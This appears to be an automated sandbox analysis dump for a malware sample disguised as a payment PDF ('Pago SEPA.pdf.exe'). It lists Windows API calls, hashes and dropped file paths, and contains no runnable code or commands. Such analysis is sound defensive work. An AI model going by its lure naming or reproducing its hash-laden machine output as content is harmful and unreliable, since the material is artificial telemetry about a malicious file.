• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
• String ID:
• API String ID: 2520467145-0
• Opcode ID: e7301913e0a94479073cab8ae1a61c2435ab6353f624b5f5e8d51b98023cedd8
• Instruction ID: 2eeca60634cad6beb8d14c100b6bedd6a8b915df4911e7a8065b20a4dbf36ab1
• Opcode Fuzzy Hash: e7301913e0a94479073cab8ae1a61c2435ab6353f624b5f5e8d51b98023cedd8
• Instruction Fuzzy Hash: E1114771A00209BFDB00DFA5CC85EAEBBB5EF44314F10403AF504F62A1EB748A40DB64
APIs
  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
• RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
• RegCloseKey.ADVAPI32(?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: b40fe6f0dc79027b05799e013f3f7e439734db4c02ce42f3ab54d2d3a1bf2c18
• Instruction ID: 318f25c97078b56e75ac6278506f01b5a34a300aa28fb7ae5d2085b0d3939190
• Opcode Fuzzy Hash: b40fe6f0dc79027b05799e013f3f7e439734db4c02ce42f3ab54d2d3a1bf2c18
• Instruction Fuzzy Hash: F7117331915205EFDB14CFA4DA489BEB7B4EF44354F20843FE405B72D0D6B85A41DB5A
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
• Instruction ID: 1e7952006d9e226a8eb598a62733b1cad305e59e596fc6f41a9a7203fe322f79
• Opcode Fuzzy Hash: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
• Instruction Fuzzy Hash: 9401D131B24210EBE7295B389C05B6A3698E720318F10867EB915F62F1DA78DC028B5D
APIs
• OleInitialize.OLE32(00000000), ref: 00405261
  • Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
• CoUninitialize.COMBASE(00000404,00000000), ref: 004052AD
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
• Opcode ID: 31e57a3ef9e746435923b88dfd7bb1bf8fe4b89e6011e28fe58d1acc60f219fe
• Instruction ID: 23d8d539379559b4eeea4a3d011d76145f80a4753e0c5d54cb32e1048881e4d2
• Opcode Fuzzy Hash: 31e57a3ef9e746435923b88dfd7bb1bf8fe4b89e6011e28fe58d1acc60f219fe
• Instruction Fuzzy Hash: 98F09073A04600EBEA219754A905B5773A4EFA0311F0548BEFE44B62E1D7795C428E6D
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
• GetProcAddress.KERNEL32(00000000,?), ref: 00406422
  • Part of subcall function 00406389: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
  • Part of subcall function 00406389: wsprintfW.USER32 ref: 004063DB
  • Part of subcall function 00406389: LoadLibraryW.KERNELBASE(?), ref: 004063EB
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
• Instruction ID: a9e24e321ddd3f073a9e6a165911cd393abac726806fbc755e3780b1e63cb1a6
• Opcode Fuzzy Hash: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
• Instruction Fuzzy Hash: A7E086326082216BD31157745D4493B67A89BD5740306083EFD06F6181D734AC2296AD
APIs
• GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,?,004057D4,?,?,00000000,004059AA,?,?,?,?), ref: 00405BD4
• SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BE8
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CloseHandle.KERNEL32(FFFFFFFF,004035C0,?), ref: 00403799
Strings
• C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\, xrefs: 004037AD
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: CloseHandle
• String ID: C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\
• API String ID: 2962429428-2318496318
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004056D0
• GetLastError.KERNEL32 ref: 004056DE
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C8B
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEC0,?,0040BEC0,?,000000FF,00000004,00000000), ref: 00405CBA
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
                                                                      • Instruction ID: 1f6dcfa326d5252f97bf96967583e82957cdc04532489552bbed9deb9ca34131
                                                                      • Opcode Fuzzy Hash: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
                                                                      • Instruction Fuzzy Hash: 26C09B757443017BDA318F509D49F27775867A4700F2544397350F70D0C774E451D61D
                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
                                                                      • Instruction ID: 29b39a71cad52391c8dc255d064a3e1ff9ef0cb324877085b5716ecfb2dd3a49
                                                                      • Opcode Fuzzy Hash: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
                                                                      • Instruction Fuzzy Hash: 80B09236A84200BADA214B00ED09F857A62A76C701F008864B300240B0CAB284A2DB19
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403504,?), ref: 00403230
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                      • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                      • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                      • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403EDD), ref: 0040410F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: d47f543a0a5cf9255e047f9efd0c7089eb13675c2c376fedb6fe0e8f1e294cbf
                                                                      • Instruction ID: 08b0993790eca83da4683932159a1945e4cd9185bce414af844fcd550f832719
                                                                      • Opcode Fuzzy Hash: d47f543a0a5cf9255e047f9efd0c7089eb13675c2c376fedb6fe0e8f1e294cbf
                                                                      • Instruction Fuzzy Hash: 9AA01132808000ABCA028B80EF08C0ABB22FBE0300B008838F2008003083320820EB0A
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B12
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B1D
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B67
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B7A
                                                                      • SetWindowLongW.USER32(?,000000FC,004050F2), ref: 00404B93
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA7
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB9
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCF
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BDB
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BED
                                                                      • DeleteObject.GDI32(00000000), ref: 00404BF0
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C1B
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C27
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CBD
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE8
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CFC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D2B
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D39
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D4A
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E47
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EAC
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EC1
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE5
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F05
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F1A
                                                                      • GlobalFree.KERNEL32(?), ref: 00404F2A
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FA3
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040504C
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040505B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040507B
                                                                      • ShowWindow.USER32(?,00000000), ref: 004050C9
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050D4
                                                                      • ShowWindow.USER32(00000000), ref: 004050DB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                      • Instruction ID: d9c0fbcad293e7aaadacffa1f228c55c0cff6ebba89157b443eef3cf19c2f35f
                                                                      • Opcode Fuzzy Hash: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                      • Instruction Fuzzy Hash: AF026FB0A00209EFDB209F54DD85AAE7BB5FB84314F10857AF610BA2E1D7799D42CF58
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045CD
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F7
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A8
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046B3
                                                                      • lstrcmpiW.KERNEL32(004271C0,00422708,00000000,?,?), ref: 004046E5
                                                                      • lstrcatW.KERNEL32(?,004271C0), ref: 004046F1
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404703
                                                                        • Part of subcall function 00405748: GetDlgItemTextW.USER32(?,?,00000400,0040473A), ref: 0040575B
                                                                        • Part of subcall function 004062B3: CharNextW.USER32(00409300,*?|<>/":,00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00406316
                                                                        • Part of subcall function 004062B3: CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
                                                                        • Part of subcall function 004062B3: CharNextW.USER32(00409300,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040632A
                                                                        • Part of subcall function 004062B3: CharPrevW.USER32(00409300,00409300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040633D
                                                                      • GetDiskFreeSpaceW.KERNEL32(004206D8,?,?,0000040F,?,004206D8,004206D8,?,00000001,004206D8,?,?,000003FB,?), ref: 004047C6
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047E1
                                                                        • Part of subcall function 0040493A: lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                        • Part of subcall function 0040493A: wsprintfW.USER32 ref: 004049E4
                                                                        • Part of subcall function 0040493A: SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                      Strings
                                                                      • A, xrefs: 004046A1
                                                                      • C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers, xrefs: 004046CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers
                                                                      • API String ID: 2624150263-3694781455
                                                                      • Opcode ID: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
                                                                      • Instruction ID: 5fc8bddc00f1cc174a6dc329f65f284a7a254117467b0892f0b405221262b822
                                                                      • Opcode Fuzzy Hash: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
                                                                      • Instruction Fuzzy Hash: D9A150B1D00209ABDB11AFA5CC85AAF77B8EF84315F11843BF611B72D1D77C8A418B69
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(0040749C,?,00000001,0040748C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers, xrefs: 00402154
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers
                                                                      • API String ID: 542301482-1972456662
                                                                      • Opcode ID: 87a5f908d3bd2182804ba30c2672ef8e3d0a2ca2c39b5d61ff5879bf35877680
                                                                      • Instruction ID: 6cbe38940624da38e40774ab578681f1f604b85ca8fb8198b005fe2b44c0e728
                                                                      • Opcode Fuzzy Hash: 87a5f908d3bd2182804ba30c2672ef8e3d0a2ca2c39b5d61ff5879bf35877680
                                                                      • Instruction Fuzzy Hash: A7411D75A00208AFCF00DFA4CD889AD7BB5FF48314B20457AF515EB2D1D7799A41CB55
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: b0aae25d2898bb461b76f53aafdea6f4486cb2c90bd3fc953c79824aff6e0f85
                                                                      • Instruction ID: 5886dfe4bc611d4993f15ed40ae28ce81127269af5662ddb55851ccd49cbf6f1
                                                                      • Opcode Fuzzy Hash: b0aae25d2898bb461b76f53aafdea6f4486cb2c90bd3fc953c79824aff6e0f85
                                                                      • Instruction Fuzzy Hash: 10F05E71A00115ABC711EFA4DD49AAEB378FF04324F1005BBF105E21E1D6B89A409B29
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040431E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404332
                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434F
                                                                      • GetSysColor.USER32(?), ref: 00404360
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040436E
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040437C
                                                                      • lstrlenW.KERNEL32(?), ref: 00404381
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040438E
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043A3
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043FC
                                                                      • SendMessageW.USER32(00000000), ref: 00404403
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040442E
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404471
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447F
                                                                      • SetCursor.USER32(00000000), ref: 00404482
                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004044A3
                                                                      • SetCursor.USER32(00000000), ref: 004044A6
                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D5
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: N$open
                                                                      • API String ID: 3615053054-904208323
                                                                      • Opcode ID: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
                                                                      • Instruction ID: 4b5324550c8b175de7ac8ee9e9744dd98fad869a56f6e91fb07d2f074fcd5292
                                                                      • Opcode Fuzzy Hash: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
                                                                      • Instruction Fuzzy Hash: F87172B1A00209BFDB109F60DD85E6A7B69FB84354F00853AF705B62E1C778AD51CFA9
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,00428220,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
